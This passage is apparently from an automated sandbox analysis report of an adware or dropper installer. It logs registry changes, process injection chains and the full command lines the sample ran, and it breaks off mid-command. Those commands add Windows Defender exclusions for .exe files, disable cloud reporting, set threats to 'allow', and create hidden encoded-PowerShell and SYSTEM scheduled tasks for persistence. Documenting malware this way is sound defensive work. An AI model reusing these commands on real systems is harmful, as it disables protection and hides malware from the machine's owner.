Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\TelemetrySalt = "4" C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\gDVVBwl.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\gDVVBwl.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" C:\Windows\SysWOW64\rundll32.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\gDVVBwl.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\gDVVBwl.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\gDVVBwl.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\gDVVBwl.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\gDVVBwl.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\gDVVBwl.exe N/A
N/A N/A C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\gDVVBwl.exe N/A
N/A N/A C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\gDVVBwl.exe N/A
N/A N/A C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\gDVVBwl.exe N/A
N/A N/A C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\gDVVBwl.exe N/A
N/A N/A C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\gDVVBwl.exe N/A
N/A N/A C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\gDVVBwl.exe N/A
N/A N/A C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\gDVVBwl.exe N/A
N/A N/A C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\gDVVBwl.exe N/A
N/A N/A C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\gDVVBwl.exe N/A
N/A N/A C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\gDVVBwl.exe N/A
N/A N/A C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\gDVVBwl.exe N/A
N/A N/A C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\gDVVBwl.exe N/A
N/A N/A C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\gDVVBwl.exe N/A
N/A N/A C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\gDVVBwl.exe N/A
N/A N/A C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\gDVVBwl.exe N/A
N/A N/A C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\gDVVBwl.exe N/A
N/A N/A C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\gDVVBwl.exe N/A
N/A N/A C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\gDVVBwl.exe N/A
N/A N/A C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\gDVVBwl.exe N/A
N/A N/A C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\gDVVBwl.exe N/A
N/A N/A C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\gDVVBwl.exe N/A
N/A N/A C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\gDVVBwl.exe N/A
N/A N/A C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\gDVVBwl.exe N/A
N/A N/A C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\gDVVBwl.exe N/A
N/A N/A C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\gDVVBwl.exe N/A
N/A N/A C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\gDVVBwl.exe N/A
N/A N/A C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\gDVVBwl.exe N/A
N/A N/A C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\gDVVBwl.exe N/A
N/A N/A C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\gDVVBwl.exe N/A
N/A N/A C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\gDVVBwl.exe N/A
N/A N/A C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\gDVVBwl.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 448 wrote to memory of 1284 N/A C:\Users\Admin\AppData\Local\Temp\PL\setup.exe C:\Users\Admin\AppData\Local\Temp\7zS9F5D.tmp\Install.exe
PID 448 wrote to memory of 1284 N/A C:\Users\Admin\AppData\Local\Temp\PL\setup.exe C:\Users\Admin\AppData\Local\Temp\7zS9F5D.tmp\Install.exe
PID 448 wrote to memory of 1284 N/A C:\Users\Admin\AppData\Local\Temp\PL\setup.exe C:\Users\Admin\AppData\Local\Temp\7zS9F5D.tmp\Install.exe
PID 1284 wrote to memory of 1612 N/A C:\Users\Admin\AppData\Local\Temp\7zS9F5D.tmp\Install.exe C:\Users\Admin\AppData\Local\Temp\7zSA160.tmp\Install.exe
PID 1284 wrote to memory of 1612 N/A C:\Users\Admin\AppData\Local\Temp\7zS9F5D.tmp\Install.exe C:\Users\Admin\AppData\Local\Temp\7zSA160.tmp\Install.exe
PID 1284 wrote to memory of 1612 N/A C:\Users\Admin\AppData\Local\Temp\7zS9F5D.tmp\Install.exe C:\Users\Admin\AppData\Local\Temp\7zSA160.tmp\Install.exe
PID 1612 wrote to memory of 1344 N/A C:\Users\Admin\AppData\Local\Temp\7zSA160.tmp\Install.exe C:\Windows\SysWOW64\forfiles.exe
PID 1612 wrote to memory of 1344 N/A C:\Users\Admin\AppData\Local\Temp\7zSA160.tmp\Install.exe C:\Windows\SysWOW64\forfiles.exe
PID 1612 wrote to memory of 1344 N/A C:\Users\Admin\AppData\Local\Temp\7zSA160.tmp\Install.exe C:\Windows\SysWOW64\forfiles.exe
PID 1612 wrote to memory of 2960 N/A C:\Users\Admin\AppData\Local\Temp\7zSA160.tmp\Install.exe C:\Windows\SysWOW64\forfiles.exe
PID 1612 wrote to memory of 2960 N/A C:\Users\Admin\AppData\Local\Temp\7zSA160.tmp\Install.exe C:\Windows\SysWOW64\forfiles.exe
PID 1612 wrote to memory of 2960 N/A C:\Users\Admin\AppData\Local\Temp\7zSA160.tmp\Install.exe C:\Windows\SysWOW64\forfiles.exe
PID 2960 wrote to memory of 2356 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 2960 wrote to memory of 2356 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 2960 wrote to memory of 2356 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 1344 wrote to memory of 412 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 1344 wrote to memory of 412 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 1344 wrote to memory of 412 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 412 wrote to memory of 2968 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 2356 wrote to memory of 3660 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 412 wrote to memory of 2968 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 412 wrote to memory of 2968 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 2356 wrote to memory of 3660 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 2356 wrote to memory of 3660 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 2356 wrote to memory of 4896 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 2356 wrote to memory of 4896 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 2356 wrote to memory of 4896 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 412 wrote to memory of 4004 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 412 wrote to memory of 4004 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 412 wrote to memory of 4004 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 1612 wrote to memory of 924 N/A C:\Users\Admin\AppData\Local\Temp\7zSA160.tmp\Install.exe C:\Windows\SysWOW64\schtasks.exe
PID 1612 wrote to memory of 924 N/A C:\Users\Admin\AppData\Local\Temp\7zSA160.tmp\Install.exe C:\Windows\SysWOW64\schtasks.exe
PID 1612 wrote to memory of 924 N/A C:\Users\Admin\AppData\Local\Temp\7zSA160.tmp\Install.exe C:\Windows\SysWOW64\schtasks.exe
PID 1612 wrote to memory of 1084 N/A C:\Users\Admin\AppData\Local\Temp\7zSA160.tmp\Install.exe C:\Windows\SysWOW64\schtasks.exe
PID 1612 wrote to memory of 1084 N/A C:\Users\Admin\AppData\Local\Temp\7zSA160.tmp\Install.exe C:\Windows\SysWOW64\schtasks.exe
PID 1612 wrote to memory of 1084 N/A C:\Users\Admin\AppData\Local\Temp\7zSA160.tmp\Install.exe C:\Windows\SysWOW64\schtasks.exe
PID 4284 wrote to memory of 5064 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\system32\gpupdate.exe
PID 4284 wrote to memory of 5064 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\system32\gpupdate.exe
PID 1612 wrote to memory of 4728 N/A C:\Users\Admin\AppData\Local\Temp\7zSA160.tmp\Install.exe C:\Windows\SysWOW64\schtasks.exe
PID 1612 wrote to memory of 4728 N/A C:\Users\Admin\AppData\Local\Temp\7zSA160.tmp\Install.exe C:\Windows\SysWOW64\schtasks.exe
PID 1612 wrote to memory of 4728 N/A C:\Users\Admin\AppData\Local\Temp\7zSA160.tmp\Install.exe C:\Windows\SysWOW64\schtasks.exe
PID 1612 wrote to memory of 1472 N/A C:\Users\Admin\AppData\Local\Temp\7zSA160.tmp\Install.exe C:\Windows\SysWOW64\schtasks.exe
PID 1612 wrote to memory of 1472 N/A C:\Users\Admin\AppData\Local\Temp\7zSA160.tmp\Install.exe C:\Windows\SysWOW64\schtasks.exe
PID 1612 wrote to memory of 1472 N/A C:\Users\Admin\AppData\Local\Temp\7zSA160.tmp\Install.exe C:\Windows\SysWOW64\schtasks.exe
PID 4600 wrote to memory of 2936 N/A C:\Users\Admin\AppData\Local\Temp\alLGALgTRSblXywJD\nzjBlZvpbSzibxG\kkkbwzR.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4600 wrote to memory of 2936 N/A C:\Users\Admin\AppData\Local\Temp\alLGALgTRSblXywJD\nzjBlZvpbSzibxG\kkkbwzR.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4600 wrote to memory of 2936 N/A C:\Users\Admin\AppData\Local\Temp\alLGALgTRSblXywJD\nzjBlZvpbSzibxG\kkkbwzR.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2936 wrote to memory of 5116 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 2936 wrote to memory of 5116 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 2936 wrote to memory of 5116 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 5116 wrote to memory of 4360 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 5116 wrote to memory of 4360 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 5116 wrote to memory of 4360 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 2936 wrote to memory of 3808 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 2936 wrote to memory of 3808 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 2936 wrote to memory of 3808 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 2936 wrote to memory of 4912 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 2936 wrote to memory of 4912 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 2936 wrote to memory of 4912 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 2936 wrote to memory of 3384 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 2936 wrote to memory of 3384 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 2936 wrote to memory of 3384 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 2936 wrote to memory of 4240 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 2936 wrote to memory of 4240 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe

Processes

C:\Users\Admin\AppData\Local\Temp\PL\setup.exe

"C:\Users\Admin\AppData\Local\Temp\PL\setup.exe"

C:\Users\Admin\AppData\Local\Temp\7zS9F5D.tmp\Install.exe

.\Install.exe

C:\Users\Admin\AppData\Local\Temp\7zSA160.tmp\Install.exe

.\Install.exe /S /site_id "525403"

C:\Windows\SysWOW64\forfiles.exe

"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"

C:\Windows\SysWOW64\forfiles.exe

"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"

C:\Windows\SysWOW64\cmd.exe

/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&

C:\Windows\SysWOW64\cmd.exe

/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "gTkUNKGdo" /SC once /ST 00:40:55 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "gTkUNKGdo"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==

C:\Windows\system32\gpupdate.exe

"C:\Windows\system32\gpupdate.exe" /force

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum

C:\Windows\system32\gpscript.exe

gpscript.exe /RefreshSystemParam

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "gTkUNKGdo"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "bJbhxhmwQPPePEjnjA" /SC once /ST 05:04:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\alLGALgTRSblXywJD\nzjBlZvpbSzibxG\kkkbwzR.exe\" sw /site_id 525403 /S" /V1 /F

C:\Users\Admin\AppData\Local\Temp\alLGALgTRSblXywJD\nzjBlZvpbSzibxG\kkkbwzR.exe

C:\Users\Admin\AppData\Local\Temp\alLGALgTRSblXywJD\nzjBlZvpbSzibxG\kkkbwzR.exe sw /site_id 525403 /S

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD 